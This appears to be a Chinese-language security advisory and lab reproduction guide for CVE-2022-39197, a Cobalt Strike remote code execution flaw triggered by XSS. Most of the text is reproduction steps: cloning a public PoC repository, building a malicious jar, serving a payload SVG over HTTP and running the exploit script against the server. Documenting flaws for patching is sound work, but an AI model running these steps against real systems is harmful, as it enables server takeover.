0x00 漏洞概述
2022年09月22日,360CERT监测发现了Cobalt Strike远程代码执行漏洞,漏洞编号为CVE-2022-39197,漏洞等级:严重,漏洞评分:9.8
Cobalt Strike(也称CS)由美国Red Team开发,是一款基于java的内网渗透测试工具,是最早的公共红队指挥和控制框架之一。Cobalt Strike旨在通过模拟几种可能的攻击工具和场景,允许渗透测试人员和网络防御人员检查他们的安全专业的强度。然而,安全测试套件也被黑客(包括勒索软件团伙)广泛使用,以渗透目标网络。
0x01 漏洞详情
CVE-2022-39197: Cobalt Strike 远程代码执行漏洞
CVE: CVE-2022-39197
组件: Cobalt Strike
漏洞类型: 代码执行
影响: 服务器接管
简述: 该漏洞存在于Cobalt Strike的Beacon软件中,可能允许攻击者通过在Beacon配置中设置假用户名,触发XSS,进而在 CS Server上造成远程代码执行。
0x02 影响版本
Cobalt Strike <= 4.7
0x03 漏洞复现
复现环境说明
192.168.1.4 Cobalt Strike服务器(kali)
192.168.1.1 Python http服务器 放置远程加载 payload (EvilJar-1.0-jar-with-dependencies.jar和 evil.svg)
192.168.1.6 受害机器(Win7 反过来说他也是攻击机器 CVE-2022-39197.py)
CVE-2022-39197 RCE POC
目录文件介绍
│ cve-2022-39197.py # POC
│ README.md
│ requirements.txt # python依赖
│
├─EvilJar
│ │ pom.xml #依赖
│ │
│ ├─META-INF
│ │ MANIFEST.MF
│ │
│ └─src
│ └─main
│ └─java
│ Exploit.java #执行的命令
│
├─images
│ 1.jpg
│
└─serve
evil.svg # 远程加载恶意文件
EvilJar-1.0-jar-with-dependencies.jar # 生成的jar包
3.1 启动 Cobalt Strike 本次复现版本为 4.3
./teamserver 192.168.1.4 123456
./start.sh
3.2 创建一个Listen 和 Windows Executable
3.3 下载 POC 编译 EvilJar-1.0-jar-with-dependencies.jar
git clone https://github.com/its-arun/CVE-2022-39197/
# mvn编译
mvn compile
mvn package
将 EvilJar-1.0-jar-with-dependencies.jar 移动到 serve/ 目录下
在serve目录下创建一个简易的http服务
python3 -m http.server 8000
修改 evil.svg
链接为简易http主机IP
3.4 执行POC 触发XSS
WIn7上线
python cve-2022-39197.py beacon.exe http://192.168.1.1:8000/evil.svg
查看进程列表触发 XSS 执行命令
0x04 修复建议
通用修补建议
根据影响版本中的信息,排查并升级到安全版本。
